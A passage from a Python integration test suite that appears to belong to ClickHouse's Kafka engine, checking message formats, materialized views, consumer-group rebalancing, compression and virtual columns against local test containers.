00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
fpath = p.join(p.dirname(__file__), ref_file)
with open(fpath) as reference:
if check:
assert TSV(result) == TSV(reference)
else:
return TSV(result) == TSV(reference)
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
client.connect_blocking()
list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
future = client.send(list_members_in_groups)
while not future.is_done:
for resp, f in client.recv():
f.success(resp)
(error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]
res = []
for member in members:
(member_id, client_id, client_host, member_metadata, member_assignment) = member
member_info = {}
member_info['member_id'] = member_id
member_info['client_id'] = client_id
member_info['client_host'] = client_host
member_topics_assignment = []
for (topic, partitions) in MemberAssignment.decode(member_assignment).assignment:
member_topics_assignment.append({'topic': topic, 'partitions': partitions})
member_info['assignment'] = member_topics_assignment
res.append(member_info)
return res
# Fixtures
@pytest.fixture(scope="module")
def kafka_cluster():
try:
cluster.start()
kafka_id = instance.cluster.kafka_docker_id
print(("kafka_id is {}".format(kafka_id)))
yield cluster
finally:
cluster.shutdown()
@pytest.fixture(autouse=True)
def kafka_setup_teardown():
instance.query('DROP DATABASE IF EXISTS test; CREATE DATABASE test;')
# logging.debug("kafka is available - running test")
yield # run test
# Tests
def test_kafka_issue11308(kafka_cluster):
# Check that matview does respect Kafka SETTINGS
kafka_produce(kafka_cluster, 'issue11308', ['{"t": 123, "e": {"x": "woof"} }', '{"t": 123, "e": {"x": "woof"} }',
'{"t": 124, "e": {"x": "test"} }'])
instance.query('''
CREATE TABLE test.persistent_kafka (
time UInt64,
some_string String
)
ENGINE = MergeTree()
ORDER BY time;
CREATE TABLE test.kafka (t UInt64, `e.x` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue11308',
kafka_group_name = 'issue11308',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n',
kafka_flush_interval_ms=1000,
input_format_import_nested_json = 1;
CREATE MATERIALIZED VIEW test.persistent_kafka_mv TO test.persistent_kafka AS
SELECT
`t` AS `time`,
`e.x` AS `some_string`
FROM test.kafka;
''')
while int(instance.query('SELECT count() FROM test.persistent_kafka')) < 3:
time.sleep(1)
result = instance.query('SELECT * FROM test.persistent_kafka ORDER BY time;')
instance.query('''
DROP TABLE test.persistent_kafka;
DROP TABLE test.persistent_kafka_mv;
''')
expected = '''\
123 woof
123 woof
124 test
'''
assert TSV(result) == TSV(expected)
def test_kafka_issue4116(kafka_cluster):
# Check that format_csv_delimiter parameter works now - as part of all available format settings.
kafka_produce(kafka_cluster, 'issue4116', ['1|foo', '2|bar', '42|answer', '100|multi\n101|row\n103|message'])
instance.query('''
CREATE TABLE test.kafka (a UInt64, b String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue4116',
kafka_group_name = 'issue4116',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
format_csv_delimiter = '|';
''')
result = instance.query('SELECT * FROM test.kafka ORDER BY a;')
expected = '''\
1 foo
2 bar
42 answer
100 multi
101 row
103 message
'''
assert TSV(result) == TSV(expected)
def test_kafka_consumer_hang(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang", num_partitions=8, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang',
kafka_group_name = 'consumer_hang',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 8;
CREATE TABLE test.view (key UInt64, value UInt64) ENGINE = Memory();
CREATE MATERIALIZED VIEW test.consumer TO test.view AS SELECT * FROM test.kafka;
''')
instance.wait_for_log_line('kafka.*Stalled', repetitions=20)
# This should trigger heartbeat fail,
# which will trigger REBALANCE_IN_PROGRESS,
# and which can lead to consumer hang.
kafka_cluster.pause_container('kafka1')
instance.wait_for_log_line('heartbeat error')
kafka_cluster.unpause_container('kafka1')
# logging.debug("Attempt to drop")
instance.query('DROP TABLE test.kafka')
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# original problem appearance was a sequence of the following messages in librdkafka logs:
# BROKERFAIL -> |ASSIGN| -> REBALANCE_IN_PROGRESS -> "waiting for rebalance_cb" (repeated forever)
# so it was waiting forever while the application will execute queued rebalance callback
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
def test_kafka_consumer_hang2(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="consumer_hang2", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.kafka;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
CREATE TABLE test.kafka2 (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'consumer_hang2',
kafka_group_name = 'consumer_hang2',
kafka_format = 'JSONEachRow';
''')
# first consumer subscribe the topic, try to poll some data, and go to rest
instance.query('SELECT * FROM test.kafka')
# second consumer do the same leading to rebalance in the first
# consumer, try to poll some data
instance.query('SELECT * FROM test.kafka2')
# echo 'SELECT * FROM test.kafka; SELECT * FROM test.kafka2; DROP TABLE test.kafka;' | clickhouse client -mn &
# kafka_cluster.open_bash_shell('instance')
# first consumer has pending rebalance callback unprocessed (no poll after select)
# one of those queries was failing because of
# https://github.com/edenhill/librdkafka/issues/2077
# https://github.com/edenhill/librdkafka/issues/2898
instance.query('DROP TABLE test.kafka')
instance.query('DROP TABLE test.kafka2')
# from a user perspective: we expect no hanging 'drop' queries
# 'dr'||'op' to avoid self matching
assert int(instance.query("select count() from system.processes where position(lower(query),'dr'||'op')>0")) == 0
def test_kafka_csv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv',
kafka_group_name = 'csv',
kafka_format = 'CSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_tsv_with_delimiter(kafka_cluster):
messages = []
for i in range(50):
messages.append('{i}\t{i}'.format(i=i))
kafka_produce(kafka_cluster, 'tsv', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'tsv',
kafka_group_name = 'tsv',
kafka_format = 'TSV';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_select_empty(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="empty", num_partitions=1, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'empty',
kafka_group_name = 'empty',
kafka_format = 'TSV',
kafka_row_delimiter = '\\n';
''')
assert int(instance.query('SELECT count() FROM test.kafka')) == 0
def test_kafka_json_without_delimiter(kafka_cluster):
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'json', [messages])
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'json',
kafka_group_name = 'json',
kafka_format = 'JSONEachRow';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_protobuf(kafka_cluster):
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 0, 20)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 20, 1)
kafka_produce_protobuf_messages(kafka_cluster, 'pb', 21, 29)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb',
kafka_group_name = 'pb',
kafka_format = 'Protobuf',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def test_kafka_string_field_on_first_position_in_protobuf(kafka_cluster):
# https://github.com/ClickHouse/ClickHouse/issues/12615
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 0, 20)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 20, 1)
kafka_produce_protobuf_social(kafka_cluster, 'string_field_on_first_position_in_protobuf', 21, 29)
instance.query('''
CREATE TABLE test.kafka (
username String,
timestamp Int32
) ENGINE = Kafka()
SETTINGS
kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'string_field_on_first_position_in_protobuf',
kafka_group_name = 'string_field_on_first_position_in_protobuf',
kafka_format = 'Protobuf',
kafka_schema = 'social:User';
''')
result = instance.query('SELECT * FROM test.kafka', ignore_error=True)
expected = '''\
John Doe 0 1000000
John Doe 1 1000001
John Doe 2 1000002
John Doe 3 1000003
John Doe 4 1000004
John Doe 5 1000005
John Doe 6 1000006
John Doe 7 1000007
John Doe 8 1000008
John Doe 9 1000009
John Doe 10 1000010
John Doe 11 1000011
John Doe 12 1000012
John Doe 13 1000013
John Doe 14 1000014
John Doe 15 1000015
John Doe 16 1000016
John Doe 17 1000017
John Doe 18 1000018
John Doe 19 1000019
John Doe 20 1000020
John Doe 21 1000021
John Doe 22 1000022
John Doe 23 1000023
John Doe 24 1000024
John Doe 25 1000025
John Doe 26 1000026
John Doe 27 1000027
John Doe 28 1000028
John Doe 29 1000029
John Doe 30 1000030
John Doe 31 1000031
John Doe 32 1000032
John Doe 33 1000033
John Doe 34 1000034
John Doe 35 1000035
John Doe 36 1000036
John Doe 37 1000037
John Doe 38 1000038
John Doe 39 1000039
John Doe 40 1000040
John Doe 41 1000041
John Doe 42 1000042
John Doe 43 1000043
John Doe 44 1000044
John Doe 45 1000045
John Doe 46 1000046
John Doe 47 1000047
John Doe 48 1000048
John Doe 49 1000049
'''
assert TSV(result) == TSV(expected)
def test_kafka_protobuf_no_delimiter(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 0, 20)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 20, 1)
kafka_produce_protobuf_messages_no_delimeters(kafka_cluster, 'pb_no_delimiter', 21, 29)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
instance.query('''
CREATE TABLE test.kafka_writer (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'pb_no_delimiter',
kafka_group_name = 'pb_no_delimiter',
kafka_format = 'ProtobufSingle',
kafka_schema = 'kafka.proto:KeyValuePair';
''')
instance.query("INSERT INTO test.kafka_writer VALUES (13,'Friday'),(42,'Answer to the Ultimate Question of Life, the Universe, and Everything'), (110, 'just a number')")
time.sleep(1)
result = instance.query("SELECT * FROM test.kafka ORDER BY key", ignore_error=True)
expected = '''\
13 Friday
42 Answer to the Ultimate Question of Life, the Universe, and Everything
110 just a number
'''
assert TSV(result) == TSV(expected)
def test_kafka_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mv',
kafka_group_name = 'mv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mv', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_recreate_kafka_table(kafka_cluster):
'''
Checks that materialized view work properly after dropping and recreating the Kafka table.
'''
# line for backporting:
# admin_client = KafkaAdminClient(bootstrap_servers="localhost:9092")
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="recreate_kafka_table", num_partitions=6, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(120):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
instance.query('''
DROP TABLE test.kafka;
''')
kafka_produce(kafka_cluster,'recreate_kafka_table', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'recreate_kafka_table',
kafka_group_name = 'recreate_kafka_table_group',
kafka_format = 'JSONEachRow',
kafka_num_consumers = 6,
kafka_flush_interval_ms = 1000,
kafka_skip_broken_messages = 1048577;
''')
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*recreate_kafka_table', repetitions=6, look_behind_lines=100)
# data was not flushed yet (it will be flushed 7.5 sec after creating MV)
assert int(instance.query("SELECT count() FROM test.view")) == 240
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_librdkafka_compression(kafka_cluster):
"""
Regression for UB in snappy-c (that is used in librdkafka),
backport pr is [1].
[1]: https://github.com/ClickHouse-Extras/librdkafka/pull/3
Example of corruption:
2020.12.10 09:59:56.831507 [ 20 ] {} <Error> void DB::StorageKafka::threadFunc(size_t): Code: 27. DB::Exception: Cannot parse input: expected '"' before: 'foo"}': (while reading the value of key value): (at row 1)
To trigger this regression there should duplicated messages
Orignal reproducer is:
$ gcc --version |& fgrep gcc
gcc (GCC) 10.2.0
$ yes foobarbaz | fold -w 80 | head -n10 >| in-…
$ make clean && make CFLAGS='-Wall -g -O2 -ftree-loop-vectorize -DNDEBUG=1 -DSG=1 -fPIC'
$ ./verify in
final comparision of in failed at 20 of 100
"""
supported_compression_types = ['gzip', 'snappy', 'lz4', 'zstd', 'uncompressed']
messages = []
expected = []
value = 'foobarbaz'*10
number_of_messages = 50
for i in range(number_of_messages):
messages.append(json.dumps({'key': i, 'value': value}))
expected.append(f'{i}\t{value}')
expected = '\n'.join(expected)
for compression_type in supported_compression_types:
logging.debug(('Check compression {}'.format(compression_type)))
topic_name = 'test_librdkafka_compression_{}'.format(compression_type)
admin_client = admin.AdminClient({'bootstrap.servers': "localhost:{}".format(kafka_cluster.kafka_port)})
topic = admin.NewTopic(topic=topic_name, num_partitions=1, replication_factor=1, config={
'compression.type': compression_type,
})
admin_client.create_topics(new_topics=[topic], validate_only=False)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = 'JSONEachRow',
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.consumer Engine=Log AS
SELECT * FROM test.kafka;
'''.format(topic_name=topic_name) )
kafka_produce(kafka_cluster, topic_name, messages)
instance.wait_for_log_line("Committed offset {}".format(number_of_messages))
result = instance.query('SELECT * FROM test.consumer')
assert TSV(result) == TSV(expected)
instance.query('DROP TABLE test.kafka SYNC')
instance.query('DROP TABLE test.consumer SYNC')
def test_kafka_materialized_view_with_subquery(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mvsq',
kafka_group_name = 'mvsq',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM (SELECT * FROM test.kafka);
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mvsq', messages)
while True:
result = instance.query('SELECT * FROM test.view')
if kafka_check_result(result):
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
kafka_check_result(result, True)
def test_kafka_many_materialized_views(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view1;
DROP TABLE IF EXISTS test.view2;
DROP TABLE IF EXISTS test.consumer1;
DROP TABLE IF EXISTS test.consumer2;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'mmv',
kafka_group_name = 'mmv',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view1 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.view2 (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer1 TO test.view1 AS
SELECT * FROM test.kafka;
CREATE MATERIALIZED VIEW test.consumer2 TO test.view2 AS
SELECT * FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'mmv', messages)
while True:
result1 = instance.query('SELECT * FROM test.view1')
result2 = instance.query('SELECT * FROM test.view2')
if kafka_check_result(result1) and kafka_check_result(result2):
break
instance.query('''
DROP TABLE test.consumer1;
DROP TABLE test.consumer2;
DROP TABLE test.view1;
DROP TABLE test.view2;
''')
kafka_check_result(result1, True)
kafka_check_result(result2, True)
def test_kafka_flush_on_big_message(kafka_cluster):
# Create batchs of messages of size ~100Kb
kafka_messages = 1000
batch_messages = 1000
messages = [json.dumps({'key': i, 'value': 'x' * 100}) * batch_messages for i in range(kafka_messages)]
kafka_produce(kafka_cluster, 'flush', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush',
kafka_group_name = 'flush',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
received = False
while not received:
try:
offsets = client.list_consumer_group_offsets('flush')
for topic, offset in list(offsets.items()):
if topic.topic == 'flush' and offset.offset == kafka_messages:
received = True
break
except kafka.errors.GroupCoordinatorNotAvailableError:
continue
while True:
result = instance.query('SELECT count() FROM test.view')
if int(result) == kafka_messages * batch_messages:
break
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert int(result) == kafka_messages * batch_messages, 'ClickHouse lost some messages: {}'.format(result)
def test_kafka_virtual_columns(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt1',
kafka_group_name = 'virt1',
kafka_format = 'JSONEachRow';
''')
messages = ''
for i in range(25):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
messages = ''
for i in range(25, 50):
messages += json.dumps({'key': i, 'value': i}) + '\n'
kafka_produce(kafka_cluster, 'virt1', [messages], 0)
result = ''
while True:
result += instance.query(
'''SELECT _key, key, _topic, value, _offset, _partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) AS _timestamp FROM test.kafka''',
ignore_error=True)
if kafka_check_result(result, False, 'test_kafka_virtual1.reference'):
break
kafka_check_result(result, True, 'test_kafka_virtual1.reference')
def test_kafka_virtual_columns_with_materialized_view(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'virt2',
kafka_group_name = 'virt2',
kafka_format = 'JSONEachRow',
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64, kafka_key String, topic String, offset UInt64, partition UInt64, timestamp Nullable(DateTime('UTC')))
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT *, _key as kafka_key, _topic as topic, _offset as offset, _partition as partition, _timestamp = 0 ? '0000-00-00 00:00:00' : toString(_timestamp) as timestamp FROM test.kafka;
''')
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'virt2', messages, 0)
sql = 'SELECT kafka_key, key, topic, value, offset, partition, timestamp FROM test.view ORDER BY kafka_key'
result = instance.query(sql)
iterations = 0
while not kafka_check_result(result, False, 'test_kafka_virtual2.reference') and iterations < 10:
time.sleep(3)
iterations += 1
result = instance.query(sql)
kafka_check_result(result, True, 'test_kafka_virtual2.reference')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
def test_kafka_insert(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
